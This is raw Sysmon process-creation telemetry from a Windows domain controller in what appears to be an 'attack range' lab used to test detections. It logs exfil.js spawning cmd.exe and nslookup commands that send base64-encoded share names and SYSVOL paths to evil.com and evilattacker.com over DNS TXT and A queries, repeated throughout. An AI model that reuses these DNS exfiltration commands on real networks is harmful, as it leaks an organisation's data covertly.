-type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B3B-6078-310F-00000000AE01}4244C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpqoo.tmp 2>&1 154100x800000000000000072617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:51.570{A8622C2F-5B3B-6078-310F-00000000AE01}4244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpqoo.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072591Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:49.265{A8622C2F-5B39-6078-300F-00000000AE01}5800C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B39-6078-2E0F-00000000AE01}4804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlolvkw.tmp 2>&1 154100x800000000000000072580Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:49.233{A8622C2F-5B39-6078-2E0F-00000000AE01}4804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlolvkw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072570Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:48.668{A8622C2F-5B38-6078-2D0F-00000000AE01}4180C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B38-6078-2B0F-00000000AE01}4140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnzpdo.tmp 2>&1 154100x800000000000000072559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:48.638{A8622C2F-5B38-6078-2B0F-00000000AE01}4140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnzpdo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072481Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:39.217{A8622C2F-5B2F-6078-2A0F-00000000AE01}2828C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B2F-6078-280F-00000000AE01}6268C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlheedj.tmp 2>&1 154100x800000000000000072470Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:39.187{A8622C2F-5B2F-6078-280F-00000000AE01}6268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlheedj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:22.208{A8622C2F-5B1E-6078-270F-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072401Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:21.531{A8622C2F-5B1D-6078-260F-00000000AE01}5952C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B1D-6078-240F-00000000AE01}4772C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliozn.tmp 2>&1 154100x800000000000000072390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:21.502{A8622C2F-5B1D-6078-240F-00000000AE01}4772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliozn.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:20.653{A8622C2F-5B1C-6078-230F-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072364Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:19.986{A8622C2F-5B1B-6078-220F-00000000AE01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072355Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:19.304{A8622C2F-5B1B-6078-210F-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072341Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:17.553{A8622C2F-5B19-6078-200F-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:16.871{A8622C2F-5B18-6078-1F0F-00000000AE01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072318Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:16.204{A8622C2F-5B18-6078-1E0F-00000000AE01}1736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072287Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.667{A8622C2F-5B13-6078-1D0F-00000000AE01}4804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B13-6078-1B0F-00000000AE01}6084C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvsbc.tmp 2>&1 154100x800000000000000072276Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.636{A8622C2F-5B13-6078-1B0F-00000000AE01}6084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvsbc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.093{A8622C2F-5B13-6078-1A0F-00000000AE01}920C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B13-6078-180F-00000000AE01}2196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsm.tmp 2>&1 154100x800000000000000072251Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.062{A8622C2F-5B13-6078-180F-00000000AE01}2196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:09.029{A8622C2F-5B11-6078-170F-00000000AE01}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B10-6078-150F-00000000AE01}4832C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllsoey.tmp 2>&1 154100x800000000000000072216Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:08.999{A8622C2F-5B10-6078-150F-00000000AE01}4832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllsoey.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:51.435{A8622C2F-5AFF-6078-140F-00000000AE01}2488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AFF-6078-120F-00000000AE01}4180C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxoqg.tmp 2>&1 154100x800000000000000072144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:51.405{A8622C2F-5AFF-6078-120F-00000000AE01}4180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxoqg.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:38.946{A8622C2F-5AF2-6078-110F-00000000AE01}5212C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AF2-6078-0F0F-00000000AE01}6492C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpexlf.tmp 2>&1 154100x800000000000000072024Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:38.916{A8622C2F-5AF2-6078-0F0F-00000000AE01}6492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpexlf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071970Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:23.874{A8622C2F-5AE3-6078-0E0F-00000000AE01}4376C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AE3-6078-0C0F-00000000AE01}6044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbxxy.tmp 2>&1 154100x800000000000000071959Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:23.844{A8622C2F-5AE3-6078-0C0F-00000000AE01}6044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbxxy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" 